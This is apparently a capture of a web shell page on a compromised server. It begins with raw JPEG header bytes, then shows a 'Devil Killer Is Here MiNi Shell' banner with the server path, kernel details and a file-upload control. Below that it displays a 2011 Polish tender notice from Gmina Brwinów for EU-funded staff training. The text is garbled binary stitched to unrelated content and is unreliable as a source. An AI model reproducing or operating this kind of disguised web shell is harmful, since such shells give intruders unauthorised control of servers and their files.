JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111121/303117-N-2011.html

<p class="kh_header"><b>Brwinów: Organizacja cyklu szkoleń w ramach projektu Podniesienie kompetencji pracowników i jakości funkcjonowania Urzędu Gminy Brwinów współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej</b><br>
<b>Numer ogłoszenia: 303117 - 2011; data zamieszczenia: 21.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja cyklu szkoleń w ramach projektu Podniesienie kompetencji pracowników i jakości funkcjonowania Urzędu Gminy Brwinów współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest kompleksowa realizacja szkoleń dla pracowników Urzędu Gminy Brwinów uczestniczących w projekcie - Podniesienie kompetencji pracowników i jakości funkcjonowania Urzędu Gminy Brwinów- współfinansowanegoze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej, którego beneficjentem jest Gmina Brwinów:
Część nr 1: Prawo zamówień publicznych, Prawo budowlane Kodeks postępowania administracyjnego, kodeks cywilny, techniki legislacyjne.
Część nr 2: Proces inwestycyjny, kosztorysowanie.
Część nr 3: Tworzenie matrycy i profili kompetencyjnych, Wdrażanie matrycy i profili kompetencyjnych, Efektywność wdrażania modelu, Komunikacja interpersonalna, Asertywność, Trudne sytuacje w obsłudze klienta, Trwałe budowanie wizerunku klienta, Tworzenie kodeksu etycznego pracowników, Warsztat podsumowujący, Efektywność  wprowadzania kodeku etycznego, Sztuka zarządzania zespołem, Sztuka budowania autorytetu, Sztuka motywowania.
Część nr 4: Obsługa oprogramowania biurowego.
Część nr 5: Tworzenie ankiety badającej satysfakcję klientów, Prowadzenie zebrań i spotkań. Moderowanie spotkań z obywatelami, Konsultacje społeczne.
Część nr 6: Język angielski.
Część nr 7: Język migowy.
2. Cykl obejmuje 24 tematy szkoleniowe przedstawione w tabeli Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. Liczebność grup zależna będzie od danego tematu szkoleniowego i mieścić się będzie w przedziale 6-20 osób.
3. Szkolenia o numerach 3 (część nr 1), 4 (część nr 2), 9 (część nr 3) i 21 (część nr 5) w tabeli  Wykaz szkoleń, stanowiącej załącznik nr 1A do oferty, są szkoleniami wyjazdowymi. Pozostałe szkolenia odbywać się będą w siedzibie Zamawiającego. 
4. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
5. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń. Poza ww. materiałami szkoleniowymi, szkolenie w Części nr 2 poz.5 tabeli Kosztorysowanie obejmuje także dostarczenie zamawiającemu programu do kosztorysowania wraz z licencją ilości 1 sztuki.  
6. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
7. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
8. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
9. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
10. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
11. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
12. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych. 
13. W przypadku szkoleń wyjazdowych Wykonawca zobowiązany jest dodatkowo zapewnić uczestnikom szkolenia transport, 1 nocleg (1 noc) oraz wyżywienie określone w pkt.15 poniżej. Miejsce szkolenia wyjazdowego nie powinno być oddalone od siedziby Zamawiającego o więcej niż 100 km.
13.1. Wykonawca zapewni nocleg w hotelu o standardzie minimum 3-gwiazdkowym wyposażonym w salę szkoleniową odpowiednią dla liczebności danej grupy szkoleniowej. Uczestnicy szkolenia zakwaterowani zostaną w pokojach jedno- bądź dwuosobowych. Zakwaterowanie nastąpić powinno najpóźniej na 30 minut przed rozpoczęciem szkolenia.
13.2. Wyżywienie w ramach szkolenia powinno zostać podane w restauracji znajdującej się nie dalej niż 100m od sali szkoleniowej i bazy noclegowej. Uczestnikom zostaną podane: 
- Pierwszego dnia szkolenia: - obiad i kolacja. 
- Drugiego dnia szkolenia - śniadanie i obiad. 
Śniadanie może być podane w formie bufetu szwedzkiego. 
Obiad musi składać się z przystawki, zupy i dania głównego, soku, deseru, herbaty, kawy. 
Kolacja musi składać się z: dwóch dań podanych na ciepło. Dodatkowo - zestaw wędlin, zestaw serów, zestaw sałatek, pieczywo, masło, soki owocowe, woda mineralna gazowana i niegazowana, kawa  i herbata podana na życzenie, cukier.
13.3. Transport uczestników przypadać musi w dni rozpoczęcia i zakończenia szkolenia. Godziny szkoleniowe powinny uwzględniać czas transportu uczestników do miejsca szkolenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-  w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej 2 usługi polegające na zorganizowaniu i przeprowadzeniu szkoleń, lub seminariów, lub warsztatów, które muszą:
1) być zgodne z rodzajem/tematem szkolenia, stanowiącym przedmiot składanej oferty,
2) obejmować - każda:
- dot. części nr 1 - co najmniej 50 uczestników i co najmniej 50 godzin,
- dot. części nr 2 - co najmniej 30 uczestników i co najmniej 30 godzin,
- dot. części nr 3 - co najmniej 50 uczestników i co najmniej 50 godzin,
- dot. części nr 4 - co najmniej 40 uczestników i co najmniej 100 godzin,
- dot. części nr 5 - co najmniej 50 uczestników i co najmniej 30 godzin,
- dot. części nr 6 - co najmniej 30 uczestników i co najmniej 100 godzin,
- dot. części nr 7 - co najmniej 5 uczestników i co najmniej 20 godzin, 
potwierdzone dokumentami o należytym wykonaniu.

1.Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone  dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) załącznik nr 2- oświadczenie o spełnianiu warunków udziału w postępowaniu;
2) załącznik nr 3 - wykaz usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały należycie wykonane;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponować następującymi osobami:
- co najmniej po 1 wykładowcy dla każdej części przedmiotu zamówienia, 
- każdy z wykazanych wykładowców musi posiadać min. 5 letnie doświadczenie w prowadzeniu szkoleń, w tym przeprowadził co najmniej 4 szkolenia o zakresie obejmującym tematykę szkolenia określoną dla części zamówienia, na którą składa ofertę.

1.Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone  dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) załącznik nr 2- oświadczenie o spełnianiu warunków udziału w postępowaniu;
2) załącznik nr 4 - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami; 
3) załącznik nr 5 - oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany podmiotu trzeciego (podwykonawcy), na którego zasobach Wykonawca potwierdził spełnianie warunków udziału w postępowaniu o udzielenie niniejszego zamówienia publicznego, a nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 
3)	zmiany podwykonawców lub zakresu robót wykonywanych przez podwykonawców zgłoszonych przez Wykonawców według postanowień § 6 umowy,
4)	zmiany szkoleń wyjazdowych,
5)	zmian w zakresie liczebności poszczególnych grup szkoleniowych,
6)	zmiany liczby grup szkoleniowych przypisanych do danego szkolenia,
7)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.KOŚCIUSZKI 4A, Zespół ds. Zamówień Publicznych pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2011 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.GRODZISKA 12, pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Kapitał Ludzki, Priorytet V. Dobre rządzenie, Działanie 5.2. Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1. Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prawo zamówień publicznych, Prawo budowlane, Kodeks postępowania administracyjnego, kodeks cywilny, techniki legislacyjne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Tematy szkoleniowe przedstawione w tabeli  Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. 
2. Szkolenie - Kodeks postępowania administracyjnego, kodeks cywilny, techniki legislacyjne - poz.3 w tabeli  Wykaz szkoleń, jest szkoleniem wyjazdowym. Pozostałe szkolenia odbywać się będą w siedzibie Zamawiającego. 
3. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
4. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń. 
5. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
6. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
8. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
9. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
